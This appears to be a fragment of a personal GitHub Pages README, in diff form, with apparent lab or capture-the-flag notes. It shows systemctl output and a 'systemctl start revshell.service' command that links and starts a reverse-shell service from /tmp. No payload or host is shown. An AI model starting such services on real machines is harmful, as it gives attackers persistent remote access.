dayaramb/dayaramb.github.io/README.md

 Created symlink from /etc/systemd/system/multi-user.target.wants/revshell.service to /tmp/revshell.service.
 Job for daya.service failed because the control process exited with error code.
 See "systemctl status revshell.service" and "journalctl -xe" for details.

-systemctl start revshell.service
+It seems I don't even have to enable the service. linking is fine. systemctl start revshell.service

 ```